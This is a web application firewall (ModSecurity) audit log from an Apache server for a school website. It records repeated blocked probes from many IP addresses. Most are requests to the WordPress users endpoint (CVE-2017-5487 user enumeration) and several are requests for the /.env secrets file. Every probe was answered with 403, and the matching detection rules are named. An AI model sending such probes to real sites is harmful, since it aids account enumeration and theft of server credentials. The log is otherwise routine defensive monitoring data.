Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4fa8d1f-Z-- --68b5cd62-A-- [25/May/2025:20:05:30 +0700] aDMVmnawJq5017Xs8D4qrgAAANA 103.236.140.4 46500 103.236.140.4 8181 --68b5cd62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.25.111.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.25.111.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --68b5cd62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68b5cd62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748178330148477 3119 (- - -) Stopwatch2: 1748178330148477 3119; combined=1359, p1=467, p2=861, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68b5cd62-Z-- --67701062-A-- [25/May/2025:20:56:34 +0700] aDMhknawJq5017Xs8D4qwwAAANY 103.236.140.4 46796 103.236.140.4 8181 --67701062-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.36.228.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.36.228.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --67701062-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67701062-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748181394842078 3035 (- - -) Stopwatch2: 1748181394842078 3035; combined=1352, p1=483, p2=838, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67701062-Z-- --1ebb9a47-A-- [25/May/2025:21:27:44 +0700] aDMo4NerygsLmB9N_YSsCwAAAJg 103.236.140.4 47006 103.236.140.4 8181 --1ebb9a47-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --1ebb9a47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebb9a47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748183264131057 901 (- - -) Stopwatch2: 1748183264131057 901; combined=382, p1=337, p2=0, p3=0, p4=0, p5=45, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebb9a47-Z-- --8b981858-A-- [25/May/2025:21:27:45 +0700] aDMo4derygsLmB9N_YSsDAAAAIY 103.236.140.4 47010 103.236.140.4 8181 --8b981858-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --8b981858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b981858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748183265225973 686 (- - -) Stopwatch2: 1748183265225973 686; combined=257, p1=225, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b981858-Z-- --50bfbe32-A-- [25/May/2025:21:29:56 +0700] aDMpZNerygsLmB9N_YSsEAAAAIw 103.236.140.4 47020 103.236.140.4 8181 --50bfbe32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --50bfbe32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50bfbe32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748183396708761 3306 (- - -) Stopwatch2: 1748183396708761 3306; combined=1446, p1=505, p2=909, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50bfbe32-Z-- --d1711b5e-A-- [25/May/2025:21:33:04 +0700] aDMqIHawJq5017Xs8D4q2AAAAMo 103.236.140.4 47044 103.236.140.4 8181 --d1711b5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.158.233.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1711b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1711b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748183584675514 3269 (- - -) Stopwatch2: 1748183584675514 3269; combined=1428, p1=478, p2=917, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1711b5e-Z-- --5d3cd727-A-- [25/May/2025:21:45:52 +0700] aDMtIBEdxfhJOSxH8A88XAAAAEI 103.236.140.4 47090 103.236.140.4 8181 --5d3cd727-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.119.116.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.119.116.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5d3cd727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d3cd727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748184352432186 3438 (- - -) Stopwatch2: 1748184352432186 3438; combined=1487, p1=498, p2=957, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d3cd727-Z-- --6674736c-A-- [25/May/2025:21:51:22 +0700] aDMuanP6UgzLD1l8HTpEGAAAABU 103.236.140.4 47142 103.236.140.4 8181 --6674736c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.241.153 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.241.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6674736c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6674736c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748184682798347 800 (- - -) Stopwatch2: 1748184682798347 800; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6674736c-Z-- --a7b19b42-A-- [25/May/2025:21:51:23 +0700] aDMua3P6UgzLD1l8HTpEGQAAABQ 103.236.140.4 47148 103.236.140.4 8181 --a7b19b42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.241.153 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.241.153 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a7b19b42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b19b42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748184683823803 634 (- - -) Stopwatch2: 1748184683823803 634; combined=246, p1=214, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b19b42-Z-- --6191b050-A-- [25/May/2025:22:02:33 +0700] aDMxCXawJq5017Xs8D4q9wAAAMQ 103.236.140.4 47194 103.236.140.4 8181 --6191b050-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6191b050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6191b050-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748185353882095 854 (- - -) Stopwatch2: 1748185353882095 854; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6191b050-Z-- --11863d38-A-- [25/May/2025:23:05:14 +0700] aDM_unP6UgzLD1l8HTpFMgAAAAk 103.236.140.4 49954 103.236.140.4 8181 --11863d38-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.209.207.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.209.207.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11863d38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11863d38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748189114560157 2730 (- - -) Stopwatch2: 1748189114560157 2730; combined=1224, p1=416, p2=779, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11863d38-Z-- --c2cb545f-A-- [25/May/2025:23:05:55 +0700] aDM_43awJq5017Xs8D4sfwAAANg 103.236.140.4 50164 103.236.140.4 8181 --c2cb545f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.1.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.1.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2cb545f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2cb545f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748189155266551 2485 (- - -) Stopwatch2: 1748189155266551 2485; combined=1167, p1=373, p2=769, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2cb545f-Z-- --1aa68a31-A-- [25/May/2025:23:28:02 +0700] aDNFEnP6UgzLD1l8HTpJ9gAAAAY 103.236.140.4 59178 103.236.140.4 8181 --1aa68a31-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.117.144.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1aa68a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1aa68a31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748190482792336 2783 (- - -) Stopwatch2: 1748190482792336 2783; combined=1225, p1=412, p2=784, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1aa68a31-Z-- --5957d563-A-- [25/May/2025:23:45:24 +0700] aDNJJHP6UgzLD1l8HTpKAgAAAAo 103.236.140.4 59240 103.236.140.4 8181 --5957d563-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.216.10.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.216.10.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5957d563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5957d563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748191524572450 2780 (- - -) Stopwatch2: 1748191524572450 2780; combined=1234, p1=418, p2=788, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5957d563-Z-- --4677df4b-A-- [26/May/2025:00:46:36 +0700] aDNXfBEdxfhJOSxH8A9A5AAAAFM 103.236.140.4 59690 103.236.140.4 8181 --4677df4b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.191.38.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.191.38.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4677df4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4677df4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748195196995750 2827 (- - -) Stopwatch2: 1748195196995750 2827; combined=1245, p1=440, p2=775, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4677df4b-Z-- --80283265-A-- [26/May/2025:01:27:40 +0700] aDNhHHawJq5017Xs8D40ZwAAAMg 103.236.140.4 33096 103.236.140.4 8181 --80283265-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 2.179.194.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 2.179.194.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80283265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80283265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748197660627852 2398 (- - -) Stopwatch2: 1748197660627852 2398; combined=1123, p1=384, p2=710, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80283265-Z-- --993e5236-A-- [26/May/2025:01:28:39 +0700] aDNhV3awJq5017Xs8D40agAAAMo 103.236.140.4 33104 103.236.140.4 8181 --993e5236-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.169.98.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.169.98.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --993e5236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --993e5236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748197719631440 2786 (- - -) Stopwatch2: 1748197719631440 2786; combined=1221, p1=414, p2=778, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
